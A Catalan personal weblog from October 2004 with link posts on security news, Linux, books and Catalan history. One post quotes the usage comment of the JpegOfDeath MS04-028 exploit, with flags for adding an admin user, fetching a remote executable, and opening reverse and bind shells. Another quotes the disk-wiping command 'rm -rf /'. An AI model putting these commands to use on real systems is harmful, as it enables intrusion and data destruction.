Última actualització: 12/10/2004; 10:16:14
Weblog d'en Xavi Caballé
Pàgina personal de Xavier Caballé.
«When you're tired of what you got, try me»
        

Weblog d'en Xavi Caballé

dissabte, 9 / octubre / 2004


Star Wars en DVDFa un parell de setmanes vaig comprar el pack amb l'edició en DVD de les tres pel·lícules clàssiques de «La Guerra de les Galàxies»: «Una nova esperança» (títol de la primera pel·lícula, la de l'any 1977 on sortia el primer Estel de la Mort), «L'imperi contraataca» i «El retorn del Jedi». 

L'únic retret que puc fer a aquesta edició és la manca del català com opció d'idioma per escoltar la pel·lícula, però la resta és el conjunt ben conegut. Potser el més curiós es que la denominació clàssica de «La Guerra de les Galàxies» no surt per enlloc; en tots els casos s'utiliza la denominació anglesa.

De les diferències que vaig indicar fa uns dies, la única que he notat és el nou aspecte del cuc Jabba. La resta passen totalment inadvertides.

Encara no he mirat el quart DVD, el d'històries addicionals, però és que gairebé mai miro aquests DVD.


18:23 (# Enllaç permanent) | |


[Micro Persuasion] Coca-Cola Internal Marketing Blog Leaks Out. Coca Cola utilitza els weblogs com eina interna de marketing. I a més l'havien deixat obert, encara que a hores d'ara ja l'han protegit amb usuari i contrasenya.


17:48 (# Enllaç permanent) | |


[VIa Slashdot] Hack a Day, web en fase beta que proet explicar un truc avançat al dia.


17:41 (# Enllaç permanent) | |


Curiosa pàgina d'IBM: Globalizing your e-business posant el català com un aspecte a considerar en les estratègies de màrketing:

Catalan is a romance language that is spoken in the Western Mediterranian in parts of Spain, France, Andorra, and Italy.

While Catalan does not have official status in the European Union (EU), it is the language with the largest number of speakers of any of the minority or regional languages in the EU.Approximately 7 to 8 million speakers consider it their mother tongue. As such it is probably more widely spoken than eight of the twenty official languages of the EU, specifically, Danish, Estonian, Finnish, Latvian, Lithuanian, Maltese, Slovak, and Slovenian. Actually, the population of Catalan speakers is in the same approximate range as Greek, Portuguese, and Swedish.

Spain is home to the majority of Catalan speakers. Catalan is a coofficial language with Spanish in three parts of Spain, specifically, Catalonia (also known as Catalunya), the Balearic Islands, and Valencia. It is also spoken, but is not official in Aragon. According to the 1996 census, almost 80% of the people in the province of Catalonia speak Catalan and 95% understand it. The numbers in the Balearic Islands are similar while in Valencia, about 50% of the population speaks Catalan.

Catalan is the only official language of Andorra and is coofficial with Italian and Sardinian in the Sardinian city of Alghero. It is also spoken in the Roussillon province in Southern France. These three regions combined represent less than 200 thousand speakers.

There are a number of dialects of Catalan. Some examples are Central, Balear, Valencian, and Algherese. As with all dialects, this means that there are some small differences in terminology, spelling, and pronunciation. Newspapers and television use a common form of Catalan that attempts to select vocabulary that can be understood by all speakers.

The language of Catalan should be evaluated as part of any marketing strategy for the Eastern part of Spain and Andorra.
 

Actualització - Traducció al català

El català és un idioma d'arrels llatines que es parla a la Mediterrània occidental, en parts d'Espanya, França, Andorra i Itàlia.

Malgrat que el català no té un status oficial a la Unió Europea, és l'idioma amb més parlants de tots els idiomes minoritaris i regionals d'Europa. Aproximadament uns 7 o 8 milions el consideren com la seva llengua materna. Això fa que tingui més parlants que vuit dels vint idiomes oficials de la Unió Europea: el danès, l'estonià, el finès, el latvi, el lituà, el maltès, l'eslovè i l'eslovac. De fet, el nombre de parlants del català es equivalent al nombre de parlants del grec, el portuguès o el suec.

Espanya és l'estat on viuen la major part dels parlants del català. El català és cooficial, juntament amb l'espanyol, a tres zones de l'estat: Catalunya, les Illes Balears i València. També es parla, malgrat que no és oficial, a l'Aragó. D'acord amb el cens de l'any 1996, aproximadament el 80% dels habitants de Catalunya el parlen i un 95% l'entenen. A les Illes Balears la proporció es semblant mentre que a València aproximadament la meitat de la població parla el català.

El català és l'únic idioma oficial a Andorra i és cooficial, juntament amb l'italià i el sard, a l'Alguer. També es parla al Rosselló, al sud-est de França. Aquestes tres regions combinades representen menys de 200.000 parlants.

Hi ha diverses formes dialectals del català, com la central, l'illenc, el valencià i l'alguerès. Com en totes les formes dialectals, hi ha diferències menors en la terminologia, escriptura i pronunciació. Els diaris i la televisió fan servir una forma comú del català que intenta utilitzar un vocabulari que pot ser comprés per tots els parlants.

El català cal tenir-lo en compte alhora de planificar una estratègia de màrqueting a l'est d'Espanya i a Andorra.
 

Tant debò IBM apliqués aquests consells...


16:31 (# Enllaç permanent) | |


[InfoWorld] Security supply and demand. Jon Udell entrevista a Russ Cooper, de Cybertrust sobre la responsabilitat de IW: Microsoft en la seguretat:
IW: Are you saying that SP2 [Service Pack 2] reflects a changed consumer attitude?

RC: No, unfortunately not. It represents a consensus amongst consumers and security professionals about how much restriction we can put on standard functionality without ticking off the people who don’t care about security. It’s neither as convenient as consumers would like nor as secure as security pros would recommend.

IW: Is Microsoft really changing?

RC: We are seeing a real cultural change, but there’s no history to back it up. The SP2 deliverable represents a dramatic shift. … We see [Microsoft] doing things they would never have done before, such as increasing support cost to provide security and recognizing that security will affect product sales. Will this shift be permanent, or will they flip back to feature-driven mode? We don’t know.

(...)

IW: Any final advice?

RC: Get SP2 installed. There’s no rush, but do it. Realize, though, that apart from user education -- which is valuable -- we’re not going to see the direct benefits of any of this for years. Also realize that consumers are the ones affecting us the most. Whatever we can do to improve their environment will make our lives simpler because we’ll have fewer things attacking us.
 


16:11 (# Enllaç permanent) | |


[Exchange Security] More on the Treo and Exchange ActiveSync.


16:05 (# Enllaç permanent) | |


[News.com] Expert: Online extortion growing more common. Segons el director de SANS Institute, cada vegada és més habitual l'ús de l'extorsió a Internet:
Six or seven thousand organizations are paying online extortion demands," Alan Paller said at the SANS Institute's Top 20 Vulnerabilities conference in London. "The epidemic of cybercrime is growing. You don't hear much about it because it's extortion, and people feel embarrassed to talk about it."

"There's an enormous amount of extortion. We are concerned...(that) the technologies of extracting money could be used to endanger the (critical national infrastructure). One of the things we are talking about is how to mitigate that threat."
 


16:02 (# Enllaç permanent) | |


Microsoft ha retirat la versió beta del MSN Messenger 7.0 ja que s'ha descobert un problema de seguretat en una de les noves funcions, que podria arribar a comprometre els ordinadors on està instal·lat el programa:
Testers discovered a potential security issue in the early version of MSN Messenger 7 shortly after Microsoft made the instant messaging client available to a select group of testers over the weekend, according to postings on MSN Messenger enthusiast Web site Mess.be.

The problem lies in a new MSN Messenger feature dubbed "winks" that allows users to send each other sound animations. The feature can be abused to overwhelm a user's system.
 


15:53 (# Enllaç permanent) | |


JabberPortava molt temps sense entrar a la missatgeria instantània del Jabber i, com acostuma a passar, m'he oblidat de la meva contrasenya i no he pogut recuperar-la (ja que tampoc recordo des de quin compte de correu em vaig donar d'alta).

Així doncs que he hagut de crear un nou compte: os2man@jabber.org. A l'anterior tampoc no es que tingués masses contactes, però... en fi, que hi farem :-(


12:49 (# Enllaç permanent) | |


[HowToDoThings.com] Password Authentication. Malgrat tots els seus problemes, les contrasenyes continuen sent el sistema més utilitzat per a la autenticació de la identitat, tant d'usuaris com de sistemes. En aquest document es mostren algunes consideracions per tal de millorar la qualitat d'aquest mètode, aplicant principis de xifrat.


12:26 (# Enllaç permanent) | |

divendres, 8 / octubre / 2004


Un script que afegeix, dins de la barra de cercadors del Firefox, la consulta de termes al Diccionari de la Llengua Catalana de l'IEC.


22:36 (# Enllaç permanent) | |


[Netcraft] ASP.NET Security Flaw can Bypass Password
A security flaw in Microsoft's ASP.NET technology could allow intruders to enter password-protected areas of a web site by altering a URL. A fix is not yet available, but Microsoft is offfering guidelines to help ASP.NET users secure their sites against intrusion attempts. The flaw exists only in ASP.NET, not ASP (Active Server Pages).
 


06:59 (# Enllaç permanent) | |

[Atalaya] Cuando Google se resfría... toda la Internet estornuda.

06:57 (# Enllaç permanent) | |


[O'Reilly] Test Driving OpenOffice.org, the Next Generation. Les primeres impressions sobre l'OpenOffice.org 2.0, a partir de la versió pre-alpha disponible en l'actualitat.


06:53 (# Enllaç permanent) | |


HagakiPCMitsuishi ha desenvolupat el «HagakiPC», un ordinador PC de la mida d'una postal (13,5x10,7x1,8 cm i 340 grams de pes) capaç d'executar Windows XP.

Incorpora 128 MB de memòria més una memòria flash de 128 MB addicionals, un slot per CompactFlash, un port USB, una pantalla de 4 polzades que dóna una resolució 640x480 i un processador a 266 MHz. Funciona amb dues piles AA, que li donen una autonomia de 4 hores.

Per a més detalls sobre aquest equip, podeu veure l'anàlisi que es fa a Handtops.com.


06:50 (# Enllaç permanent) | |


El 7 d'octubre de 1994 Dave Winer enviava un missatge a la indústria del software... el seguiment d'aquest missatge va ser l'origen del primer weblog.
Ten years ago today I sent an email to the software industry, about a Marc Canter product rollout. That was followed by a series of emails, many hundred of them, most written by me, but some written by others. In 1997, the email flow spawned what I called a news site which eventually became known as a weblog, and then shortened to blog.
 


06:39 (# Enllaç permanent) | |


Microsoft ha publicat més informació sobre la vulnerabilitat a ASP.NET i a més ha publicat una eina, Microsoft ASP.NET ValidatePath module (VPModule.msi) que pot ser aplicada als servidors web per tal de protegir a les aplicacions ASP.NET davant els problemes de canonització de les URL coneguts fins a la data.

Addicionalment, s'ha publicat un article a la base de dades de coneixement (Programmatically Check for Canonicalization Issues with ASP.NET) amb instruccions als programadors per tal d'evitar aquesta mena de problemes de seguretat. Un segon article de la KB (HTTP module to check for canonicalization issues with ASP.NET) explica com desplegar els mòduls MSI i HTTP.


06:35 (# Enllaç permanent) | |


[Secunia] Microsoft Word Document Parsing Buffer Overflow Vulnerability. Vulnerabilitat a Microsoft Word: en obrir un document es pot provocar un desbordament de memòria que, degut a la seva naturalesa, pot arribar a permetre l'execució de codi remot.


06:20 (# Enllaç permanent) | |


[SecurityFocus] Defeating Honeypots: Network Issues, Part II. Segona part de la sèrie d'articles sobre les tàctiques utilitzades per tal d'identificar l'existència de honeypots. En aquesta segona part es presenta la part pràctica de la detecció de honeypots basats en Sebek, snort_inline, Fake AP i Bait.


06:16 (# Enllaç permanent) | |


FreeSBIE (Free System Burned in Economy), distribució tipus «LiveCD» basada en el sistema operatiu FreeBSD.


06:13 (# Enllaç permanent) | |

dijous, 7 / octubre / 2004


[The Register] McNealy: Microsoft needs Sun to beat IBM and Red Hat.


06:59 (# Enllaç permanent) | |


[News.com] Andreessen: IE faces one-two punch. L'antic màxim responsable del desenvolupament del Netscape, Mark Andreessen, veu competència en el món dels navegadors, gràcies a Firefox i Safari


06:55 (# Enllaç permanent) | |

[News.com] Study fins IT worker confidence slipping.

06:53 (# Enllaç permanent) | |


[InfoWorld] New security products 'adapting' to threats. Com les empreses fabricants de productes de seguretat s'adapten a la major complexitat de les xarxes. 


06:44 (# Enllaç permanent) | |


Això s'ha d'estudiar: missatge de [Full-Disclosure] On Polymorphic Evasion.


06:41 (# Enllaç permanent) | |


[The Inquirer] Anti-virus program detects GNU Public Licence. L'antivirus Clam Antivirus ha estat actualitzat per tal d'eliminar un fals positiu: considerava el text de la llicència GNU com un virus... 

SarcasticÉs només una curiositat, però no deixa de ser... irònic. De fet, la llicència GPL es podria arribar a considerar un virus, o millor dit... la GPL utilitza un model 'víric' ja que no es pot redistribuir codi GPL dins de codi propietari sense 'infectar-se' amb la GPL.


06:36 (# Enllaç permanent) | |


[MicroScope] A history of global hacking. Cronologia dels esdeveniments que han marcat la història del hacking. Tot va començar, segons aquesta cronologia, l'any 1971 quan John Draper se les va manegar per realitzar trucades telefòniques gratuïtes (un any més tard es fundava Apple amb l'objectiu de comercialitzar aquests dispositius -il·legals- per a fer trucades gratuïtes).


06:29 (# Enllaç permanent) | |


[ZDNet] Microsoft: Firewalls are failing to keep out hackers. El màxim responsable de seguretat de Microsoft, Fred Baumhardt, ha vist la llum i ara diu el que pràcticament tots els gurus venen dient des de fa uns quants anys: els tallafocs no són la solució als problemes de seguretat.


06:25 (# Enllaç permanent) | |


What you should know about a reported vulnerability in Microsoft ASP.NET
Microsoft is currently investigating a reported vulnerability in Microsoft ASP.NET. An attacker can send specially crafted requests to the server and view secured content without providing the proper credentials. This reported vulnerability exists in ASP.NET and does not affect ASP.

This issue affects Web content owners who are running any version of ASP.NET on Microsoft Windows 2000, Windows 2000 Server, Windows XP Professional, and Windows Server 2003.
 


06:17 (# Enllaç permanent) | |

dimecres, 6 / octubre / 2004


Schneier on Security, el weblog de Bruce Schneier, un dels gurús de seguretat més respectats.


21:29 (# Enllaç permanent) | |


Ahir es va presentar el «Manifest sobre l'ús del programari lliure a l'educació», promogut per l'Associació d'Ensenyants d'Informàtica de Catalunya.

Fins aquí tot normal... «La Vanguardia», diari més que centenari se'n fa ressò d'aquesta forma: (el ressaltat és meu):
Los profesores de informática reclaman trabajar con un temario abierto

LA VANGUARDIA - 05/10/2004

BARCELONA. (Redacción.) - La Associació d'Ensenyants d'Informàtica de Catalunya (AEIC), que aglutina a profesores de informática de centros públicos y concertados, hizo público ayer un manifiesto en favor del uso de un temario abierto para su asignatura. La iniciativa de la AEIC se produce tras dos entrevistas con responsables de la Conselleria d'Educació que, a juicio de portavoces de esta asociación, no han dado ningún fruto. Es más, la AEIC manifiesta su "total desacuerdo" con la política de la dirección general de Ordenació i Innovació Educativa.

El manifiesto argumenta un sinfín de razones a favor de la implantación de este programario y pretende mejorar la implantación de las tecnologías de la información y la comunicación (TIC) en la enseñanza. La nota establece que el uso del programario libre permite "unificar de forma legal el uso de las herramientas informáticas y acerca la posibilidad de entrar en el mundo de las TIC a los sectores más desfavorecidos y a los centros escolares más necesitados", reduciendo así la brecha tecnológica que se produce "en nuestra sociedad".

La AEIC pide a profesores, padres, alumnos, asociaciones, sindicatos y ONG relacionadas con la educación, así como a los componentes del actual Govern, que firmen este manifiesto.
 
Sembla un acudit, oi?


12:36 (# Enllaç permanent) | |


[John Beck] «rm -rf /» protection. Solaris 10 inclourà protecció per tal d'impedir que rm esborri tot el disc dur.
/bin/rm -rf /
rm of / is not allowed
 


08:20 (# Enllaç permanent) | |

Una imatge anomenada Eina.gif
Damn Small Linux és una distribució mínima de Linux que funciona directament des del CD-ROM. La imatge ISO només ocupa 50 MB, de forma que es pot instal·lar en qualsevol CD, inclosos els de mida de targeta de crèdit... o fins i tot dins d'una memòria USB.

Malgrat la seva mida, inclou tot el necessari per accedir a la web, editar documents de text, escoltar música, accés a l'IRC i el correu electrònic, actuar com a terminal.

Per a més detalls, podeu llegir aquest article: Damn Small Linux 0.8.2: a quick view.


07:17 (# Enllaç permanent) | |


[SecurityFocus] Defeating Honeypots: Network Issues, Part 1. Les tàctiques utilitzades per tal d'identificar els honeypots.


07:14 (# Enllaç permanent) | |


Downloader.Lunii, un troià que elimina els programes espies existents als ordinadors infectats.


06:57 (# Enllaç permanent) | |


[CIO] La revista especialitzada en seguretat CIO publica els resultats d'una enquesta a nivell mundial sobre l'estat de la seguretat: 2004 Global Information Security Survey. Aquesta enquesta s'ha realitzat preguntant a 8000 responsables de seguretat d'empreses d'arreu del món.


06:53 (# Enllaç permanent) | |


Una imatge anomenada Eina.gifMicrosoft ha publicat una eina d'anàlisi de la configuració de l'Exchange per tal d'identificar i ajudar a resoldre els problemes de configuració. Microsoft Exchange Server Best Practices Analyzer Tool investiga diversos paràmetres, com la configuració del directori actiu, paràmetres de rendiment, la metabase de l'IIS, la configuració del DNS i d'altres paràmetres.


06:38 (# Enllaç permanent) | |


[ComputerWorld] Microsoft sets sights on disk-to-disk backup, sobre l'anunci del nou producte de Microsoft: Data Protection Server (DPS).

DPS es bàsicament un entorn distribuït per a la realitzacoó de còpies de segureta que, a partir d'una sèrie d'agents als servidors de fitxers que es volen protegir, realitza còpies de seguretat del seu contingut.


06:33 (# Enllaç permanent) | |


Microsoft va anunciar ahir que ha llicenciat l'ús del protocol Exchange ActiveSync a Palmone per tal d'integrar-lo en la nova família de telèfons intel·ligents (el que inclou el Treo 650).


06:31 (# Enllaç permanent) | |


[ACM Queue] Security: the root of the problem. Un bon article on s'intenta cercar l'origen dels problemes de seguretat com conseqüència de males pràctiques de programació.


06:26 (# Enllaç permanent) | |


[Wired] Tira còmica: The Amazing Adventures of 802.11.


06:17 (# Enllaç permanent) | |


President CompanysFa setanta anys, el 6 d'octubre de 1934 a les vuit del vespre, el President Lluís Companys proclamava l'Estat Català, com a estat integrat dins d'una República Federal Espanyola, tallant els lligams que unien Catalunya amb el govern de dretes que governava aleshores a la República Espanyola.

Dissortadament la intervenció de l'exèrcit espanyol va impedir la consumació d'aquesta proclamació. En poc menys de deu hores, l'exèrcit havia bombardejat el Palau de la Generalitat i el President Companys en veure perduda la situació es va lliurar per tal d'evitar un riu de sang. L'Estatut va ser suspès i el govern en ple de la Generalitat fou empresonat.


00:17 (# Enllaç permanent) | |

dimarts, 5 / octubre / 2004


[Bloomberg] AT&T Tests Linux to Replace Microsoft's Windows on 70,000 PCs. Possiblement el projecte més gran de substituir Windows al parc informàtic global d'una empresa.


18:41 (# Enllaç permanent) | |


TinyApps és un weblog especialment interessant per tots aquells que estiguin (estem) interessants en conèixer trucs, descobrir petites meravelles en forma d'eines...

Per exemple, en aquests últims dies parla d'un generador de text aleatori, les eines imprescindibles per Windows que cal portar dins d'un CD, com baixar-se els fitxers ASF...


18:39 (# Enllaç permanent) | |


[NIST] PDA Forensic Tools: An Overview and Analysis. Guia per a la realització d'anàlisis forenses als ordinadors de butxaca basats en Palm OS, Pocket PC i Linux, utilitzant les eines actualment disponibles.


07:00 (# Enllaç permanent) | |


Spam Forensics: Reverse-Engineering Spammer Tactics. Presentació sobre com identificar les tècniques utilitzadez per enviar correu brossa.


06:50 (# Enllaç permanent) | |

[News.com] Wired for Security. Entrevista al CEO de McAfee.

06:33 (# Enllaç permanent) | |


[Microsoft] Step-by-Step Guide to Securing Windows XP Professional in Small and Medium Businesses. Nova edició (octubre 2004) de la Guia de Microsoft on s'expliquen les mesures de seguretat disponibles en Windows XP disponibles en aquells entorns on no s'utilitza l'Active Directory.


06:29 (# Enllaç permanent) | |


[Wired] Genome Model Applied to Software. Moltes tècniques utilitzades pels biòlegs durant el procés d'indentificació de genoma (seqüènciació de l'ADN), poden ser igualment aplicades en les feines d'enginyeria inversa.


06:18 (# Enllaç permanent) | |


[Fairfax] Windows malware count 4500 in first six months
Nearly 4500 worms and viruses which affect the Windows operating system have been documented between January and June this year by security services and anti-virus vendor Symantec in its six-monthly Internet Security Threat Report.

This was nearly 450 percent higher than for the corresponding period in 2003.

(...)

The report said Symantec had documented 1237 new vulnerabilities during the six month period, which meant 48 each week. Nearly three-quarters were considered easy to exploit, and 96 per cent were considered moderately or highly severe. 
 
 


06:14 (# Enllaç permanent) | |

dilluns, 4 / octubre / 2004


IacobusIacobus és el quart llibre de Matilde Asensi que llegeixo (després de «L'origen perdut», «L'últim cató» i «Peregrinatio»).

«Iacobus» és la història, escrita en primera persona, del monjo Galceran de Born. En començar el llibre rep l'ordre d'investigar les misterioses morts en menys d'un any del papa Climent V, el rei Felip IV de França i el cardenal Saint-Valéry. Tots ells van morir després d'assistir a la crema a la foguera del màxim responsable dels cavallers Templers i van rebre la seva maledicció: «en menys d'un any us convoco a comparèixer davant el tribunal de Deu per tal de rebre el vostre merescut càstig».

Per tal d'investigar aquestes morts, en Galceran acompanyat d'un novici (que, per cert, és el seu fill) recorren diversos zones de Provença i França, recollint pistes. Tot sembla indicar que els tres han estat assassinats per un parell de cavallers Templers.

En presentar les seves conclusions davant el papa Joan XXII, en lloc de restar alliberat, rep un altre encàrrec: trobar l'or que l'ordre dels Templers han amagat als voltants del camí de Sant Jaume.

«Iacobus» té una certa semblança amb l'argument de «L'origen perdut» i «L'últim cató». De fet aquesta és una crítica força freqüent de les novel·les de la Matilde Asensi, que repeteixen un mateix fil argumental. Però el que té molt aconseguit l'autora es crear l'atmosfera per tal d'enganxar al lector, que no pot deixar de passar les pàgines tot llegint aventures protagonitzades per personatges cultes i amb moltíssims coneixements.

Si heu llegit algun altra llibre de la Matilde Asensi i us ha agradat podeu agafar aquest llibre amb plena confiança: també uns enganxarà.

Títol: Iacobus
Autora: Matilde Asensi
Ediciones De Bolsillo
1a edició (gener 2003)
377 pàgines
ISBN 84-9759-293-X


23:28 (# Enllaç permanent) | |


[NetworkWorldFusion] Cracking the wireless security code. Comparativa de vint-i-tres productes de disset fabricants diferents per tal de verificar si es possible disposar d'una xarxa sense fils segura.


23:10 (# Enllaç permanent) | |


Les tècniques descrites a l'article Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server ja estan disponibles per a ser utilitzades amb Metasploit Framework.


21:06 (# Enllaç permanent) | |


[Netcraft] Security Holes in WordPress. WordPress és un dels entorns més populars per mantenir weblogs. S'ha descobert l'existència d'una vulnerabilitat que pot ser utilitzada per un atacant per crear pàgines dins dels servidors vulnerables.


07:00 (# Enllaç permanent) | |


[LURHQ] JPEG «Virus» Facts. Malgrat tot el que s'ha dit sobre l'existència de virus que fan ús de la vulnerabilitat MS04-028, quin és el seu efecte real?


06:58 (# Enllaç permanent) | |

Com identificar l'origen d'un missatge tot analitzant les capçaleres dels mateixos.

06:57 (# Enllaç permanent) | |


[O'Reilly Developer Weblogs] Fedora Core 2 Linux and Centrino (Intel PRO/Wireless 2100) wireless. Com configurar Fedora Core Linux per tal d'utilitzar les targetes WiFi incloses a les plaques bases d'ordinadors amb processador Intel Centrino. Es basa en la utilització de controladors nadius i no pas dels controladors de Windows amb Ndiswrapper (que consumeix molta energia)


06:48 (# Enllaç permanent) | |

Col·leccions d'icones per Windows XP.

06:09 (# Enllaç permanent) | |


[Hispasec] Implicaciones del diseño web en los ataques «phishing» comenta els aspectes bàsics del disseny d'una web que poden facilitar als usuaris la prevenció dels fraus del tipus «phishing», on els atacants simulen ser l'entitat legítima per tal de robar la identitat electrònica dels seus clients.


03:41 (# Enllaç permanent) | |


Malgrat que la interfície de línia d'ordres de Windows (executant l'intèrpret CMD.EXE) no és ni de bon tros tant potent com l'entorn que ofereixen els diversos shells del món Unix, s'ha de reconèixer que ha evolucionat força en els últims anys.

Podeu trobar més detalls a la documentació oficial: Command-line Reference de  Windows Server 2003 i Command-line Reference de Windows XP on es documenten les ordres disponibles i la nova funcionalitat que ofereixen. També són interessant els articles Command-line Nirvana i How to Use Command Line Shortcuts.


03:39 (# Enllaç permanent) | |


[Slashdot] Gates on Spyware and OS Competition. Un article de News.com (Gates: Microsoft to offer anti-spyware)explica que Microsoft oferirà productes per lluitar contra els programes espies:
Gates said Microsoft will offer software to detect malicious applications and that the company will keep it up-to-date on an ongoing basis. He did not say when the software would be available or whether Microsoft would charge for it.
 
També, en aquest mateix post d'Slashdot, comenten un parell d'articles addicionals (Gates: In Ten Years, it's a Windows and Linux Game i Gates undaunted by Linux) sobre una conferència de Bill Gates al Museu d'Història la Informàtica de Califòrnia, on afirma que d'aquí a deu anys els dos únics sistemes operatius que quedaran seran Windows i Linux.


03:05 (# Enllaç permanent) | |


El programa d'aquesta nit de «L'Internauta» de Catalunya Ràdio, centrat en parlar sobre el copyleft i la llicència Creative Commons ha estat especialment interessant amb una entrevista a Carlos Sánchez Almeida, explicant d'una forma molt planera com funcionen aquestes llicències. Us aconsello que l'escolteu (m'imagino que no trigarà molt a estar disponible a l'arxiu sonor del programa).


02:50 (# Enllaç permanent) | |

diumenge, 3 / octubre / 2004

[Vicent Partal] A l'hospital
De retorn de Menorca he hagut de passar una setmana ben bona hospitalitzat.
 
Li desitjo una ben ràpida i completa recuperació.


21:03 (# Enllaç permanent) | |


[Reflexiones e irreflexiones] El debate presidencial, diseccionado.


20:59 (# Enllaç permanent) | |


[Via Scripting News] A EVHEAD s'explica com es fa una actualització d'un Mac antic a un de nou... el que demostra com Apple és d'aquelles empreses sap fixar-se amb els detalls i demostra que els seus enginyers són autèntics usuaris del seu producte:
When you boot up a new Mac, it asks you if you're moving from an old Mac. If so, you plug a Firewire cable in, which you borrow from your co-worker, and it just copies everything over. Your files, apps, and accounts. Two hours later, you log into your new Mac, and everything's the same. And it works! Bravo.
 


20:55 (# Enllaç permanent) | |


Talladet[Slashdot] Les investigacions científiques ho confirmen: el cafè realment produeix dependència. Jo en els últims anys he baixat molt el meu consum de cafè; ara em prenc només un parell de tallats al dia (amb dies excepcionals que en prenc fins a quatre)... havia arribat a prendre fins a deu cafès al dia.
Don't be surprised if missing that cup of morning coffee gives you a headache or makes it difficult to concentrate at work. It's all part of caffeine withdrawal.
 


20:51 (# Enllaç permanent) | |


Computer virus inclou algunes dades històriques sobre el món dels virus informàtics atribuint l'origen de la distribució de virus de forma massiva a John Brunner, un dels mítics autors de ciència ficció i autor del llibre «The Shockwave Rider» (any 1975).

Les idees dels primers virus segurament van ser fixades pel joc Darwin (1961), programat pel pare de Robert Morris, Doug McIlroy i Victor Vyssotsky dels laboratoris Bell, amb la finalitat de demostrar algunes capacitats del sistema operatiu Unix.

El primer cuc informàtic amb efectes generals és sens dubte el cuc de Morris, programat per Robert Morris (fill del co-autor del joc Darwin) i que va paralitzar Internet al novembre de 1988.


16:44 (# Enllaç permanent) | |


[Newsforge] Authentication Methods in OpenBSD. Explica com configurar els mètodes d'autenticació d'OpenBSD (contrasenya i S/key).


16:28 (# Enllaç permanent) | |


JpegOfDeath.c, exploit utilitzatble de forma remota per a la vulnerabilitat MS04-028:
/*
* Exploit Name:
* =============
*  JpegOfDeath.M.c v0.6.a All in one Bind/Reverse
*        /Admin/FileDownload
* =============
* Tweaked Exploit By M4Z3R For GSO
* All Credits & Greetings Go To:
* ==========
* (...)
* ===========
* Flags Usage:
* -a: Add User X with Pass X to Admin Group; 
*  IE: Exploit.exe -a pic.jpg 
* -d: Download a File From an HTTP Server;
*  IE: Exploit.exe -d http://YourWebServer/
*        Patch.exe pic.jpg
* -r: Send Back a Shell To a Specified IP on a 
*        Specific Port;
*  IE: Exploit.exe -r 192.168.0.1 -p 123 pic.jpg 
*        (Default Port is 1337)
* -b: Bind a Shell on The Exploited Machine On a 
*        Specific Port;
*  IE: Exploit.exe -b -p 132 pic.jpg (Default Port 
*        is 1337)
*/
 
Ara la pregunta es saber quan això començarà a ser utilitzat de forma massiva per virus i cucs.


15:46 (# Enllaç permanent) | |


Fa unes tres setmanes ja vaig indicar l'existència de problemes amb el Windows Update (que només afectaven a la versió en català i que ja han estat solucionats per Microsoft). Ara Jon Udell també comenta els problemes originats per la última vulnerabilitat crítica de Windows (MS04-028) i la confusió alhora d'aplicar els pegats.


15:42 (# Enllaç permanent) | |


Una imatge anomenada Eina.gifPADS (Passive Asset Detection System) és un motor basat en la detecció de signatures amb la finalitat de detectar els actius de la xarxa. Està pensat com un complement als sistemes de detecció d'intrusions, doncs ofereix un context a les alertes generades per l'IDS.


15:36 (# Enllaç permanent) | |



© Copyright 2003-2004 Xavier Caballe. Click here to send an email to the editor of this weblog.
Last update: 12/10/2004; 10:16:16.